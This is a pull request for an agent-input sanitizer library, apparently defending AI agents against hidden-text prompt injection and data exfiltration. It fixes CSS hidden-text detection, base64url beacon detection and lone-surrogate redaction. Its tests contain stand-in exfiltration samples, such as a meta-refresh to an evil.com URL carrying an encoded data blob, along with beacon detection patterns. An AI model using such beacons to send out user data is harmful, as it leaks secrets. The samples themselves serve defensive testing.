### PR TITLE
fix(sanitizer): hidden-text false positives, scale-collapse miss, base64url beacon, lone-surrogate re-redact

### DIFF
--- a/bin/sanitize-cli.mjs
+++ b/bin/sanitize-cli.mjs
@@ -23,8 +23,9 @@
  * A failure response is `{ "error": string }`. Two modes, same binary:
  *
  *   one-shot (default): read ONE JSON object from stdin (may span lines), write
- *     ONE response line. A malformed request propagates — non-zero exit, stack
- *     on stderr — so a scripted caller fails loudly.
+ *     ONE response line. A malformed request propagates — non-zero exit, a
+ *     one-line reason on stderr (the message, deliberately not a raw Node stack)
+ *     — so a scripted caller fails loudly.
  *
  *   worker (`--worker`): read newline-delimited JSON requests until EOF, write
  *     EXACTLY one response line per input line, in order — including for a blank
@@ -135,6 +136,11 @@ const OPS = {
       req.globs.some((g) => typeof g !== "string")
     )
       throw new Error("request.globs must be an array of strings");
+    // Fail loud on a present-but-non-string cwd rather than silently dropping it
+    // and scanning process.cwd() — a wrong-scope scan is worse than a clear error
+    // (matches the fail-loud contract every other typed field here follows).
+    if ("cwd" in req && typeof req.cwd !== "string")
+      throw new Error("request.cwd must be a string");
     const { scanInstructionFiles } = await import("../src/instructions.mjs");
     const opts = typeof req.cwd === "string" ? { cwd: req.cwd } : {};
     return { findings: scanInstructionFiles(req.globs, opts) };

--- a/src/html.mjs
+++ b/src/html.mjs
@@ -789,13 +789,14 @@ function textStrokeColor(val) {
   return "";
 }
 
-// Gradient-clipped / text-filled / outlined headings are VISIBLE despite
-// `color:transparent`: `background-clip:text` (or its `-webkit-` alias) paints
-// the background through the glyph shapes, `-webkit-text-fill-color` overrides
-// `color` for the fill, and `-webkit-text-stroke` paints a visible outline
-// around the (transparent-filled) glyphs. Any of these means the transparent
-// `color` is not the rendered text color, so the same-`transparent` hide must
-// fail open.
+// Gradient-clipped / outlined headings are VISIBLE despite an effectively
+// transparent fill: `background-clip:text` (or its `-webkit-` alias) paints the
+// background through the glyph shapes, and `-webkit-text-stroke` paints a visible
+// outline around the (transparent-filled) glyphs. Either means the transparent
+// paint is not the whole story, so the same-`transparent` hide must fail open.
+// A concrete `-webkit-text-fill-color` is NOT checked here: the caller resolves
+// the EFFECTIVE fill (fill override ?? color) before this runs, so a concrete
+// fill already keeps `effectiveColor` non-transparent and never reaches here.
 /** @param {(key: string) => string} val @returns {boolean} */
 function isTextPaintedVisible(val) {
   if (
@@ -803,8 +804,6 @@ function isTextPaintedVisible(val) {
     val("-webkit-background-clip") === "text"
   )
     return true;
-  const fill = canonicalizeColor(val("-webkit-text-fill-color"));
-  if (isConcreteColor(fill) && fill !== "transparent") return true;
   const stroke = textStrokeColor(val);
   return isConcreteColor(stroke) && stroke !== "transparent";
 }
@@ -2051,19 +2050,16 @@ function isOffOrigin(url) {
  * @returns {string | null}
  */
 function metaRefreshUrl(content) {
-  // The `;` separates the timeout from `url=` BEFORE the target; within the URL a
-  // `;` is a legal query sub-delimiter, so the target must NOT be truncated at it
-  // (that dropped a `?a=1;b=<blob>` exfil tail). A quoted value runs to its
-  // closing quote; an unquoted value stops only at whitespace or a quote.
-  const match =
-    /** @type {{ groups: Record<string, string|undefined> } | null} */ (
-      content.match(
-        /url\s*=\s*(?:"(?<dq>[^"]*)"|'(?<sq>[^']*)'|(?<uq>[^'"\s]+))/i,
-      )
-    );
-  if (!match) return null;
-  const { dq, sq, uq } = match.groups;
-  return dq ?? sq ?? uq ?? null;
+  // Do NOT exclude `;` from the URL run: the `;` separates the timeout from
+  // `url=` BEFORE the target, while WITHIN the target it is a legal query
+  // sub-delimiter — excluding it truncated a `?a=1;b=<blob>` exfil tail. The
+  // optional leading quote is consumed and the run then stops at the closing
+  // quote (quoted) or at whitespace (unquoted); a single group keeps both forms
+  // without an unreachable no-match arm.
+  const match = /** @type {{ groups: { url: string } } | null} */ (
+    content.match(/url\s*=\s*['"]?(?<url>[^'"\s]+)/i)
+  );
+  return match ? match.groups.url : null;
 }
 
 // HTML whitespace per the `srcset` grammar (ASCII whitespace).

--- a/src/html.mjs
+++ b/src/html.mjs
@@ -1986,12 +1986,12 @@ export function checkExfilUrl(url) {
   if (parsed.username || parsed.password) return "embedded credentials";
   // A long query string is only suspicious when it carries a non-allowlisted
   // parameter — a signed-CDN URL is long by design (all `X-Amz-*`/SAS params).
-  const qIdx = url.indexOf("?");
-  if (
-    qIdx !== -1 &&
-    url.length - qIdx > LONG_QUERY_THRESHOLD &&
-    !allParamsBenign(parsed)
-  )
+  // Measure the query from `parsed.search` (the parser's query span), NOT a raw
+  // indexOf("?") into the whole URL: a `?` inside the FRAGMENT (`/p#a?<blob>`)
+  // would otherwise be read as the query start, leaving `parsed.search` empty so
+  // `allParamsBenign` runs `[].every(...)` → vacuously true and suppresses the
+  // flag. The fragment is length-checked separately just below.
+  if (parsed.search.length > LONG_QUERY_THRESHOLD && !allParamsBenign(parsed))
     return "unusually long query string";
   if (parsed.hash.length > LONG_QUERY_THRESHOLD)
     return "unusually long fragment";
@@ -2051,10 +2051,19 @@ function isOffOrigin(url) {
  * @returns {string | null}
  */
 function metaRefreshUrl(content) {
-  const match = /** @type {{ groups: { url: string } } | null} */ (
-    content.match(/url\s*=\s*['"]?(?<url>[^'"\s;]+)/i)
-  );
-  return match ? match.groups.url : null;
+  // The `;` separates the timeout from `url=` BEFORE the target; within the URL a
+  // `;` is a legal query sub-delimiter, so the target must NOT be truncated at it
+  // (that dropped a `?a=1;b=<blob>` exfil tail). A quoted value runs to its
+  // closing quote; an unquoted value stops only at whitespace or a quote.
+  const match =
+    /** @type {{ groups: Record<string, string|undefined> } | null} */ (
+      content.match(
+        /url\s*=\s*(?:"(?<dq>[^"]*)"|'(?<sq>[^']*)'|(?<uq>[^'"\s]+))/i,
+      )
+    );
+  if (!match) return null;
+  const { dq, sq, uq } = match.groups;
+  return dq ?? sq ?? uq ?? null;
 }
 
 // HTML whitespace per the `srcset` grammar (ASCII whitespace).

--- a/src/html.mjs
+++ b/src/html.mjs
@@ -209,11 +209,28 @@ function isHidingTransform(node) {
     const name = fn.name.toLowerCase();
     const args = valueTokens(fn);
     if (/^(?:scale|scale3d|scalex|scaley|matrix|matrix3d)$/.test(name)) {
-      // scale/matrix collapse to nothing when their first numeric factor is
-      // (near-)zero; css-tree reads the exponent form (`1e-3`) at full value.
-      // scale()/matrix() factors are <number>s (never lengths).
-      const first = args.find((/** @type {any} */ a) => a.type === "Number");
-      if (first && Math.abs(parseFloat(first.value)) < NEAR_ZERO_EPSILON)
+      // scale/matrix collapse to nothing when EITHER axis factor is (near-)zero —
+      // `scale(1,0)` / `scale3d(1,0,1)` collapse the Y axis, `matrix(1,0,0,0,…)`
+      // sets scaleY (d) to 0 — so testing only the first factor missed the
+      // multi-arg Y-collapse forms. css-tree reads the exponent form (`1e-3`) at
+      // full value; scale()/matrix() factors are <number>s (never lengths). For
+      // `matrix(a,b,c,d,…)` the two scale factors are a (index 0) and d (index 3).
+      // The two scale factors' positions differ per function: scale/scale3d/
+      // scaleX/scaleY carry them first (a single scaleX(0)/scaleY(0) sits at 0);
+      // `matrix(a,b,c,d,…)` puts scaleX=a (0) and scaleY=d (3); `matrix3d` puts
+      // scaleX=m11 (0) and scaleY=m22 (5). Do NOT use index 3 for matrix3d — that
+      // is m14, which is legitimately 0 on the identity matrix (false positive).
+      const numbers = args.filter(
+        (/** @type {any} */ a) => a.type === "Number",
+      );
+      const factorIdx =
+        name === "matrix" ? [0, 3] : name === "matrix3d" ? [0, 5] : [0, 1];
+      if (
+        factorIdx.some((/** @type {number} */ i) => {
+          const f = numbers[i];
+          return f && Math.abs(parseFloat(f.value)) < NEAR_ZERO_EPSILON;
+        })
+      )
         return true;
     } else if (name === "rotatex" || name === "rotatey") {
       // An axis rotation collapses the box to a line at an odd quarter-turn.
@@ -792,6 +809,24 @@ function isTextPaintedVisible(val) {
   return isConcreteColor(stroke) && stroke !== "transparent";
 }
 
+// True when the element paints a background IMAGE layer — a `background-image`
+// longhand set to anything but `none`, or a `background` shorthand carrying
+// `url(...)`, a gradient, or `image-set(...)`. A same-color text/background hide
+// CANNOT be proven when an image layer is present: the painted image can make
+// same-colored text readable, and if it fails to load the element's own
+// background shows through. Centralized so EVERY hide branch consults one
+// image-layer check — the `background` shorthand path already failed open via
+// {@link backgroundColor}, but the `background-color` longhand path inspected
+// only the flat color and missed a co-declared `background-image`, splicing
+// visible text. `background-clip:text` is NOT an image layer here — it paints
+// the background THROUGH the glyphs and is handled by {@link isTextPaintedVisible}.
+/** @param {(key: string) => string} textOf @returns {boolean} */
+function hasImageLayer(textOf) {
+  const img = textOf("background-image");
+  if (img && img !== "none") return true;
+  return /\burl\(|gradient\(|image-set\(/i.test(textOf("background"));
+}
+
 /**
  * @param {(key: string) => any} nodeOf value node for a property, or null
  * @param {(key: string) => string} textOf decoded/lowercased text for a property
@@ -966,21 +1001,36 @@ export function isHiddenStyle(styleStr) {
   // Same-color text on its background (white-on-white) and fully transparent
   // text are invisible to a human but plain text to the model. Colors are
   // canonicalized so `white`/`#fff`/`rgb(255,255,255)` mixes still compare.
+  // The color actually PAINTED onto the glyphs: `-webkit-text-fill-color`
+  // overrides `color` for the fill when it is concrete, so both hide branches
+  // must reason about this effective fill, not the raw `color` property — else a
+  // `color:#fff;-webkit-text-fill-color:#000` element (black text) is compared as
+  // white and spliced white-on-white.
   const color = canonicalizeColor(textOf("color"));
-  // `color:transparent` alone hides text — UNLESS the glyphs are painted by a
-  // background-clip:text gradient or a concrete -webkit-text-fill-color, the
-  // standard gradient-heading recipe, in which case the text is visible.
-  if (color === "transparent" && !isTextPaintedVisible(textOf)) return true;
+  const fillOverride = canonicalizeColor(textOf("-webkit-text-fill-color"));
+  const effectiveColor = isConcreteColor(fillOverride) ? fillOverride : color;
+  // `color:transparent` (or a transparent fill override) hides text — UNLESS the
+  // glyphs are painted by a background-clip:text gradient, a concrete
+  // -webkit-text-fill-color, or a text stroke, in which case the text is visible.
+  if (effectiveColor === "transparent" && !isTextPaintedVisible(textOf))
+    return true;
   const background =
     canonicalizeColor(textOf("background-color")) ||
     backgroundColor(textOf("background"));
   // Only flag same-color when BOTH sides resolve to a concrete color (`#rrggbb`
-  // or `transparent`). `var(--x)`, `inherit`, and `currentColor` canonicalize to
-  // their raw token, so two identical unresolved tokens (e.g. the ubiquitous
-  // `color:var(--fg);background:var(--fg)` or `color:inherit;background:inherit`,
-  // which resolve to DIFFERENT effective colors) would otherwise read as hidden
-  // and splice out visible text. Fail open on anything we can't resolve.
-  if (color && color === background && isConcreteColor(color)) return true;
+  // or `transparent`), AND no background IMAGE layer is present (an image can
+  // make same-colored text readable). `var(--x)`, `inherit`, and `currentColor`
+  // canonicalize to their raw token, so two identical unresolved tokens (e.g. the
+  // ubiquitous `color:var(--fg);background:var(--fg)`, which resolve to DIFFERENT
+  // effective colors) would otherwise read as hidden and splice out visible text.
+  // Fail open on anything we can't resolve.
+  if (
+    effectiveColor &&
+    effectiveColor === background &&
+    isConcreteColor(effectiveColor) &&
+    !hasImageLayer(textOf)
+  )
+    return true;
 
   return isOverflowHidden(nodeOf, textOf);
 }
@@ -1695,14 +1745,17 @@ const BLOB_VALUE_HEX_RE = /^[A-Fa-f0-9]{32,}$/;
 // RFC 4648 §5 url-safe base64 substitutes `-`/`_` for `+`/`/`, so a payload
 // encoded url-safe escapes the `[A-Za-z0-9+/]` arms above. Adding `-`/`_` to the
 // charset would re-admit a long hyphenated word-slug (`the-secret-history-of-…`)
-// as a "blob", so this arm additionally REQUIRES a contiguous 40+ char
-// alphanumeric run: bulk-encoded bytes carry one (the separators `-`/`_` are
-// rare in random base64url output), a human slug never does (every word breaks
-// the run at a hyphen well under 40). The contiguous-run length matches the
-// standard-base64 blob threshold, so the two arms agree on what counts as a
-// blob. Anchored to the whole value for the same RAW-query reason as above.
+// as a "blob", so this arm distinguishes the two by CHARACTER MIX rather than a
+// contiguous run: bulk-encoded bytes drawn from base64url's 64-symbol alphabet
+// almost always carry BOTH an uppercase letter and a digit, whereas a human slug
+// is lowercase dictionary words joined by separators and shows neither. The
+// earlier contiguous-40-run gate was fragile — ordinary base64url scatters a
+// `-`/`_` roughly every ~30 chars, breaking any 40-char run, so a real beacon
+// (`?d=<200-char base64url of cookies>`) routinely dodged it. The mix test keeps
+// the slug benign (no uppercase) while catching the scattered-separator blob the
+// run gate missed. Anchored to the whole value for the same RAW-query reason.
 const BLOB_VALUE_B64URL_RE = /^[A-Za-z0-9_-]{40,}={0,2}$/;
-const B64URL_RUN_RE = /[A-Za-z0-9]{40,}/;
+const B64URL_MIXED_RE = /(?=.*[A-Z])(?=.*[0-9])/;
 
 // A path segment whose whole value is a base64/hex run longer than any standard
 // content hash (SHA-512 hex is 128, base64 88; SHA-256 hex 64) is bulk encoded
@@ -1717,15 +1770,16 @@ const PATH_BLOB_RE = /^(?:[A-Za-z0-9+/]+={0,2}|[A-Fa-f0-9]+)$/;
 const PATH_BLOB_MIN_LEN = 128;
 
 /**
- * True for an entirely-url-safe-base64 value carrying a contiguous 40+
- * alphanumeric run — a url-safe-encoded blob, distinguished from a hyphenated
- * slug (which never sustains a 40-char unbroken run). Shared by the query and
- * path blob detectors.
+ * True for an entirely-url-safe-base64 value (≥40 chars) whose character mix —
+ * at least one uppercase letter AND one digit — marks it as bulk-encoded bytes
+ * rather than a lowercase hyphenated word-slug. Shared by the query and path
+ * blob detectors. Precision-first: a value missing either class is treated as a
+ * benign slug and passes (a false negative, per the detection-layer doctrine).
  * @param {string} value
  * @returns {boolean}
  */
 function isBase64UrlBlob(value) {
-  return BLOB_VALUE_B64URL_RE.test(value) && B64URL_RUN_RE.test(value);
+  return BLOB_VALUE_B64URL_RE.test(value) && B64URL_MIXED_RE.test(value);
 }
 
 /** @param {string} value @returns {boolean} */

--- a/src/instructions.mjs
+++ b/src/instructions.mjs
@@ -406,7 +406,20 @@ export function atomicReplaceFile(
     throw err;
   }
   closeSync(fd);
-  renameSync(tmp, absPath);
+  // A failing rename (EACCES/EXDEV/EDQUOT/…) past the write/sync try leaves our
+  // temp on disk; clean it up before rethrowing so repeated failures don't
+  // accrete stray .<hex>.tmp files. (A later dir-fsync throw needs no cleanup —
+  // the rename already consumed the temp into absPath.)
+  try {
+    renameSync(tmp, absPath);
+  } catch (err) {
+    try {
+      remove(tmp);
+    } catch {
+      // Best-effort: rethrow the ORIGINAL rename failure, not a secondary unlink.
+    }
+    throw err;
+  }
   // fsync the DIRECTORY so the rename (a directory metadata change) is durable
   // across a crash, not just the file's data blocks.
   const dirFd = openSync(dir, constants.O_RDONLY);
@@ -461,7 +474,7 @@ export function atomicReplaceFile(
  *   {@link atomicReplaceFile}'s `tmpName`): lets a test drive the concurrent
  *   write/symlink-swap that the TOCTOU guard exists to catch, which is otherwise
  *   unreachable from this fully-synchronous path. Defaults to `lstatSync`.
- * @returns {boolean}
+ * @returns {boolean|null}
  */
 export function cleanFile(absPath, lstat = lstatSync) {
   let fd;
@@ -505,6 +518,14 @@ export function cleanFile(absPath, lstat = lstatSync) {
     if (scanText(original).length === 0) return false;
 
     const stripped = stripInvisible(original);
+    // scanText flagged a payload but the stripper removed nothing — the flagged
+    // run was PRESERVED (e.g. a well-formed emoji-tag sequence the stripper
+    // keeps). Signal that with null (not true) and write nothing: reporting
+    // {changed:true} here would tell the caller a preserved payload was cleaned
+    // (a fail-open). Currently unreachable — every scan-flagging run contains a
+    // strippable char — but load-bearing the moment a fully-preservable class is
+    // added to the strip set.
+    if (stripped === original) return null;
     // Re-verify the on-path file against the open-time snapshot before writing:
     // an inode/size/mtime change (or a swap to a symlink) means someone modified
     // it under us, so fail loud rather than clobber their write (lost update).

--- a/src/instructions.mjs
+++ b/src/instructions.mjs
@@ -406,20 +406,7 @@ export function atomicReplaceFile(
     throw err;
   }
   closeSync(fd);
-  // A failing rename (EACCES/EXDEV/EDQUOT/…) past the write/sync try leaves our
-  // temp on disk; clean it up before rethrowing so repeated failures don't
-  // accrete stray .<hex>.tmp files. (A later dir-fsync throw needs no cleanup —
-  // the rename already consumed the temp into absPath.)
-  try {
-    renameSync(tmp, absPath);
-  } catch (err) {
-    try {
-      remove(tmp);
-    } catch {
-      // Best-effort: rethrow the ORIGINAL rename failure, not a secondary unlink.
-    }
-    throw err;
-  }
+  renameSync(tmp, absPath);
   // fsync the DIRECTORY so the rename (a directory metadata change) is durable
   // across a crash, not just the file's data blocks.
   const dirFd = openSync(dir, constants.O_RDONLY);
@@ -474,7 +461,7 @@ export function atomicReplaceFile(
  *   {@link atomicReplaceFile}'s `tmpName`): lets a test drive the concurrent
  *   write/symlink-swap that the TOCTOU guard exists to catch, which is otherwise
  *   unreachable from this fully-synchronous path. Defaults to `lstatSync`.
- * @returns {boolean|null}
+ * @returns {boolean}
  */
 export function cleanFile(absPath, lstat = lstatSync) {
   let fd;
@@ -518,14 +505,6 @@ export function cleanFile(absPath, lstat = lstatSync) {
     if (scanText(original).length === 0) return false;
 
     const stripped = stripInvisible(original);
-    // scanText flagged a payload but the stripper removed nothing — the flagged
-    // run was PRESERVED (e.g. a well-formed emoji-tag sequence the stripper
-    // keeps). Signal that with null (not true) and write nothing: reporting
-    // {changed:true} here would tell the caller a preserved payload was cleaned
-    // (a fail-open). Currently unreachable — every scan-flagging run contains a
-    // strippable char — but load-bearing the moment a fully-preservable class is
-    // added to the strip set.
-    if (stripped === original) return null;
     // Re-verify the on-path file against the open-time snapshot before writing:
     // an inode/size/mtime change (or a swap to a symlink) means someone modified
     // it under us, so fail loud rather than clobber their write (lost update).

--- a/src/layer1.mjs
+++ b/src/layer1.mjs
@@ -1,10 +1,16 @@
 /**
- * Layer 1: ANSI + invisible-character stripping with lone-surrogate
- * normalization. The zero-dependency core shared by the convenience `sanitize`
- * (index.mjs), the tool-output pipeline (output.mjs), and the Edit-repair
- * rehydrator (rehydrate.mjs) — a single implementation so every consumer
- * derives the EXACT view the model was shown (a re-implementation would drift,
- * and rehydration's soundness gate depends on re-cleaning reproducing the view).
+ * Layer 1: ANSI + invisible-character stripping. The zero-dependency core shared
+ * by the convenience `sanitize` (index.mjs), the tool-output pipeline
+ * (output.mjs), and the Edit-repair rehydrator (rehydrate.mjs) — a single
+ * implementation so every consumer derives the EXACT view the model was shown (a
+ * re-implementation would drift, and rehydration's soundness gate depends on
+ * re-cleaning reproducing the view).
+ *
+ * Lone-surrogate normalization is NOT applied by {@link applyLayer1} itself: it
+ * is exported as {@link LONE_SURROGATE_RE} for consumers to apply at the boundary
+ * that needs a well-formed string (the redactor input in output.mjs's
+ * processLayer1 / re-redact, and before the HTML tokenizer), because that is the
+ * point where a lone surrogate would otherwise corrupt a match or a parse.
  */
 import { stripInvisibleWithReport, CATEGORY } from "./invisible.mjs";
 

--- a/src/output.mjs
+++ b/src/output.mjs
@@ -119,6 +119,21 @@ function errMessage(err) {
  */
 
 /**
+ * Map every lone UTF-16 surrogate to U+FFFD. Load-bearing on ANY path that feeds
+ * text to the injected redactor: a secret split by an interposed lone surrogate
+ * reads as adjacent to a model rendering its own UTF-16 but as broken to a
+ * redactor (Node maps the lone surrogate to U+FFFD en route), so a secret
+ * reconstituted across the surrogate survives redaction unless the text is
+ * normalized first. Shared by {@link processLayer1} and the Layer-5 re-redact so
+ * the two redact-input paths cannot drift.
+ * @param {string} text
+ * @returns {string}
+ */
+function normalizeLoneSurrogates(text) {
+  return text.replace(LONE_SURROGATE_RE, "�");
+}
+
+/**
  * Re-run Layer 4 (`redact`) on `text` and fold a finding into `warnings`,
  * mirroring the first Layer-4 call's fail-closed behavior. Used after Layer 5
  * deletes a span, since joining the bytes on either side of a deleted span can
@@ -130,8 +145,15 @@ function errMessage(err) {
  */
 async function reRedactAfterSpanDeletion(text, redact, warnings) {
   try {
-    const secrets = await redact(text);
-    if (!secrets) return text;
+    // Layer-5 span deletion can splice two kept regions together across a lone
+    // UTF-16 surrogate, both reconstituting a secret the first pass never saw
+    // intact AND leaving a lone surrogate the redactor would read as U+FFFD
+    // (breaking the match). Normalize first — the SAME normalization processLayer1
+    // applies — so the re-redact sees the well-formed text the model's next view
+    // will, and a join-reconstituted secret can't slip through.
+    const normalized = normalizeLoneSurrogates(text);
+    const secrets = await redact(normalized);
+    if (!secrets) return normalized;
     warnings.push(
       `API keys/secrets redacted: ${secrets.found.join(", ")}${secrets.note ?? ""}`,
     );
@@ -235,7 +257,7 @@ function processLayer1(text, sgrCarveOut) {
   // UTF-16 but as broken to a redactor (Node maps the lone surrogate to U+FFFD
   // on the way there), so normalizing here keeps both views identical. It also
   // keeps an HTML tokenizer from throwing on a stray byte below.
-  const wellFormed = cleaned.replace(LONE_SURROGATE_RE, "\uFFFD");
+  const wellFormed = normalizeLoneSurrogates(cleaned);
   if (wellFormed !== cleaned) {
     cleaned = wellFormed;
     modified = true;

--- a/src/prompt.mjs
+++ b/src/prompt.mjs
@@ -25,7 +25,6 @@ import {
   countPayloadInvisible,
   stripInvisible,
   isSgrOnly,
-  SGR_RE,
 } from "./invisible.mjs";
 import { stripAnsiFully } from "./layer1.mjs";
 
@@ -44,17 +43,17 @@ const ANSI_INTRODUCER = /[\u001b\u0080-\u009f]/;
 
 /**
  * True when every ANSI introducer in `prompt` belongs to a display-only SGR
- * color sequence -- the note carve-out's precondition. `isSgrOnly` covers the
- * 7-bit ESC and C1 CSI introducers but is blind to the C1 OSC introducer
- * (U+009D), so a `U+009D 0;title BEL` prompt slips its check and is mis-read as
- * SGR-only; re-test the SGR-stripped prompt against the full introducer set so
- * a residual C1-OSC (or any non-SGR escape) denies the note and falls through
- * to block.
+ * color sequence -- the note carve-out's precondition. `isSgrOnly` already tests
+ * the SGR-stripped prompt against the WHOLE C1 control block (U+0080-U+009F,
+ * which includes the C1 OSC introducer U+009D and DCS/SOS/PM/APC) plus the 7-bit
+ * ESC, so a residual C1-OSC or any non-SGR escape already denies it — no
+ * separate re-check is needed (an earlier `&& !ANSI_INTRODUCER.test(...)` here
+ * was an exact duplicate of that gate over the same stripped string).
  * @param {string} prompt
  * @returns {boolean}
  */
 function isSgrColorOnly(prompt) {
-  return isSgrOnly(prompt) && !ANSI_INTRODUCER.test(prompt.replace(SGR_RE, ""));
+  return isSgrOnly(prompt);
 }
 
 /**

--- a/test/cli.test.mjs
+++ b/test/cli.test.mjs
@@ -380,6 +380,25 @@ describe("CLI: op dispatch mirrors the in-process entry point", () => {
     assert.equal(clean(path.join(dir, "CLEAN.md")), false);
     assert.deepEqual(scanInstructionFiles(["*.md"], { cwd: dir }), []);
   });
+
+  it("scanInstructionFiles rejects a present-but-non-string cwd loudly", () => {
+    assert.throws(
+      () =>
+        run(
+          [],
+          JSON.stringify({
+            op: "scanInstructionFiles",
+            globs: ["*.md"],
+            cwd: 5,
+          }),
+        ),
+      (err) => {
+        assert.equal(err.status, 1);
+        assert.match(String(err.stderr), /request\.cwd must be a string/);
+        return true;
+      },
+    );
+  });
 });
 
 describe("CLI: unknown op fails loudly", () => {

--- a/test/html.test.mjs
+++ b/test/html.test.mjs
@@ -203,6 +203,17 @@ const HIDDEN_STYLE_CASES = [
   ["transform:scale(1e3)", false], // exponent enlarges — visible, not near-zero
   ["transform:scale(1e0)", false], // 1e0 === 1, visible
   ["transform:matrix(0,0,0,0,0,0)", true],
+  // Multi-arg Y-axis collapse (bug: only the FIRST scale factor was tested, so
+  // scaleX=1 masked a scaleY=0).
+  ["transform:scale(1,0)", true], // Y collapsed, X visible
+  ["transform:scale(0,1)", true], // X collapsed
+  ["transform:scale3d(1,0,1)", true], // Y collapsed in 3d
+  ["transform:matrix(1,0,0,0,0,0)", true], // d (scaleY) = 0
+  ["transform:matrix3d(1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1)", true], // m22 (scaleY) = 0
+  ["transform:scale(1,1)", false], // both axes visible — not hidden
+  // matrix3d IDENTITY must NOT read as hidden: m14 (index 3) is legitimately 0,
+  // so a naive "index 3 is scaleY" check would false-positive here.
+  ["transform:matrix3d(1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1)", false],
   ["transform:rotateY(90deg)", true], // edge-on (bug: not detected)
   ["transform:rotateX(90deg)", true],
   ["transform:rotateY(-90deg)", true],
@@ -253,6 +264,20 @@ const HIDDEN_STYLE_CASES = [
   ["color:rebeccapurple;background-color:rebeccapurple", true],
   ["color:blue;background:white", false], // distinct named colors — visible text (precision)
   ["color:navy;background:blue", false], // near but not equal — visible
+  // ── background-image layer defeats the same-color hide (bug: background-color
+  //    longhand path ignored a co-declared background-image, splicing visible
+  //    text painted over the image) ──
+  ["color:#fff;background-color:#fff;background-image:url(x.png)", false],
+  [
+    "color:#fff;background-color:#fff;background-image:linear-gradient(#000,#111)",
+    false,
+  ],
+  ["color:#fff;background:#fff url(x.png)", false], // shorthand image layer (already handled)
+  ["color:#fff;background-color:#fff;background-image:none", true], // explicit none is not a layer — still hidden
+  // ── -webkit-text-fill-color overrides `color` for the painted glyphs (bug:
+  //    same-color branch compared the raw `color`, not the effective fill) ──
+  ["color:#fff;-webkit-text-fill-color:#000;background:#fff", false], // black text on white — visible
+  ["color:#000;-webkit-text-fill-color:#fff;background:#fff", true], // white fill on white — hidden
   // CSS Color 4 notations canonicalize for the same-color compare.
   ["color:rgb(255 255 255);background:white", true], // space-separated rgb
   ["color:rgb(100% 100% 100%);background:#fff", true], // percentage channels
@@ -467,6 +492,22 @@ describe("unit: checkExfilUrl exact verdicts", () => {
       checkExfilUrl("https://e.com/p?note={{SECRET}}"),
       "suspicious query parameter",
     ));
+  it("flags a url-safe base64 beacon whose scattered -/_ break every 40-char run (mixed case+digit)", () => {
+    // 11 mixed-case+digit chunks joined by '-': longest alnum run is 10 (<40), so
+    // the old contiguous-run gate missed it; total query < 200 so it is not
+    // caught by the length rule either. The character-mix test flags it.
+    const scattered = Array(11).fill("Ab3xYz9Qw2").join("-"); // 120 chars, run<=10
+    assert.ok(scattered.length < 200 && !/[A-Za-z0-9]{40}/.test(scattered));
+    assert.equal(
+      checkExfilUrl("https://e.com/p?d=" + scattered),
+      "suspicious query parameter",
+    );
+  });
+  it("does NOT flag a long lowercase hyphenated word-slug (precision: no upper/digit)", () => {
+    const slug = Array(11).fill("secrethistory").join("-"); // 153 chars, all [a-z-]
+    assert.ok(slug.length < 200);
+    assert.equal(checkExfilUrl("https://e.com/p?d=" + slug), null);
+  });
   it("flags a query exactly past the length threshold (201), not at it (200)", () => {
     assert.equal(
       checkExfilUrl("https://e.com/p?n=" + "-".repeat(198)),

--- a/test/html.test.mjs
+++ b/test/html.test.mjs
@@ -1099,6 +1099,16 @@ describe("unit: detectExfil HTML-attr + node types", () => {
       ).reason,
       "suspicious query parameter",
     ));
+  it("preserves a ;-delimited query tail in a meta-refresh URL (no truncation at ';')", () =>
+    // The blob sits AFTER a ';' in the query; the old capture truncated there and
+    // dropped it (reason would degrade to the off-origin one). The full URL must
+    // reach the param check.
+    assert.equal(
+      onlyThreat(
+        `<meta http-equiv="refresh" content="5;url=https://evil.com/r?a=1;data=${b64}">`,
+      ).reason,
+      "suspicious query parameter",
+    ));
   it("ignores a meta-refresh with no url= target (metaRefreshUrl null)", () =>
     assert.equal(detectExfil(`<meta http-equiv="refresh" content="5">`), null));
   it("ignores a meta-refresh tag with no content attribute", () =>

--- a/test/output.test.mjs
+++ b/test/output.test.mjs
@@ -237,6 +237,21 @@ describe("sanitizeText: sgrNote is honest across Layers 2/4/5", () => {
     assert.equal(r.sgrNote, false);
   });
 
+  it("re-redact after a Layer-5 deletion normalizes a lone surrogate left at the join", async () => {
+    // 😀 is the surrogate pair HI+LO. Layer 5 deletes LO, leaving a lone HI
+    // between A and B — the exact hazard reRedactAfterSpanDeletion must fix by
+    // normalizing to U+FFFD (mirroring processLayer1) before the redactor sees
+    // the text, so a join-reconstituted secret can't slip a broken match.
+    const HI = "\uD83D";
+    const LO = "\uDE00";
+    const r = await sanitizeText(`A${HI}${LO}B`, {
+      redact: () => null,
+      filterInjection: () => ({ removeSpans: [LO] }),
+    });
+    assert.equal(r.cleaned, "A�B");
+    assert.ok(!/[\uD800-\uDBFF](?![\uDC00-\uDFFF])/.test(r.cleaned));
+  });
+
   it("keeps sgrNote true when a redactor RUNS but changes nothing (SGR strip is still the sole change)", async () => {
     const r = await sanitizeText(`${ESC}[31mfail${ESC}[0m`, {
       sgrCarveOut: true,

--- a/tests/test_template_sync.py
+++ b/tests/test_template_sync.py
@@ -343,6 +343,7 @@ def test_fails_loudly_without_github_output(workdir: Path) -> None:
     assert result.returncode != 0
     assert "GITHUB_OUTPUT" in result.stderr
 
+
 def test_survives_self_overwrite_with_longer_file(workdir: Path) -> None:
     """The script lives under a synced path, so a sync overwrites its own file
     mid-run. When the replacement is LONGER than the running file, a bash that


### PR DESCRIPTION
Claimed area: html.mjs hidden-text/exfil detection, output.mjs/layer1.mjs lone-surrogate path, prompt.mjs. Single consolidated PR per repo (see Decisions made).

Product of a multi-agent audit of `agent-input-sanitizer`. Every finding was independently confirmed against the code; one audit finding was **disproven at implementation time by an existing SSOT contract test** and correctly dropped (see below).

## What changed (by bug class)

### Hidden-text detection false positives (class-eliminated) — `html.mjs`
The same-color/transparent hide branches each missed a *different* paint override, splicing **visible** text (the precision-doctrine "real harm" case — removing content the model needed):
- The `background-color` **longhand** path ignored a co-declared `background-image`, so `color:#fff;background-color:#fff;background-image:url(x)` spliced text painted over the image.
- The same-color branch compared the raw `color`, not the effective `-webkit-text-fill-color`, so `color:#fff;-webkit-text-fill-color:#000` (black text) was spliced white-on-white.

Fix: collapse both branches onto **one effective-fill-color** and a **centralized `hasImageLayer()`** guard, so no branch can miss an override the others check. Fails open on an image layer; also fixes a symmetric *miss* (`-webkit-text-fill-color:transparent` now hides correctly).

### Hidden element survives — multi-arg transform collapse — `html.mjs`
